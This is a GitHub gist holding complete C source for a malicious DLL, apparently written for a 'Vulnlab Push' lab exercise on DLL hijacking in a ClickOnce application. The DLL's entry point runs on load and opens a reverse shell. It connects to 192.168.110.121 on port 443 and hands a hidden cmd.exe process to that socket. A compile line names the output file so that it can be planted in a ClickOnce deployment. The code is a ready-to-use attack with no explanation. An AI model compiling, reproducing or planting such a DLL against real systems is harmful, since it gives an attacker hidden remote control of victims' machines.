Created
October 5, 2023 00:43
-
-
Save caueb/152420c135b86f56dee17856888f7c8f to your computer and use it in GitHub Desktop.
DLL hijack in Clickonce app - Vulnlab Push
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Compile with MingW: x86_64-w64-mingw32-gcc-win32 reverse.c -shared -lws2_32 -o Hijack.dll.deploy | |
#include <winsock2.h> | |
#include <windows.h> | |
#include <io.h> | |
#include <process.h> | |
#include <sys/types.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
int RevShell() { | |
WSADATA wsaData; | |
if (WSAStartup(MAKEWORD(2 ,2), &wsaData) != 0) { | |
write(2, "[ERROR] WSASturtup failed.\n", 27); | |
return (1); | |
} | |
int port = 443; | |
struct sockaddr_in sa; | |
SOCKET sockt = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); | |
sa.sin_family = AF_INET; | |
sa.sin_port = htons(port); | |
sa.sin_addr.s_addr = inet_addr("192.168.110.121"); | |
if (connect(sockt, (struct sockaddr *) &sa, sizeof(sa)) != 0) { | |
write(2, "[ERROR] connect failed.\n", 24); | |
return (1); | |
} | |
STARTUPINFO sinfo; | |
memset(&sinfo, 0, sizeof(sinfo)); | |
sinfo.cb = sizeof(sinfo); | |
sinfo.dwFlags = (STARTF_USESTDHANDLES); | |
sinfo.hStdInput = (HANDLE)sockt; | |
sinfo.hStdOutput = (HANDLE)sockt; | |
sinfo.hStdError = (HANDLE)sockt; | |
PROCESS_INFORMATION pinfo; | |
CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo); | |
return (0); | |
} | |
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { | |
switch (ul_reason_for_call) | |
{ | |
case DLL_PROCESS_ATTACH: | |
DisableThreadLibraryCalls(hModule); | |
RevShell(); | |
break; | |
case DLL_THREAD_ATTACH: | |
break; | |
case DLL_THREAD_DETACH: | |
break; | |
case DLL_PROCESS_DETACH: | |
break; | |
} | |
return TRUE; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment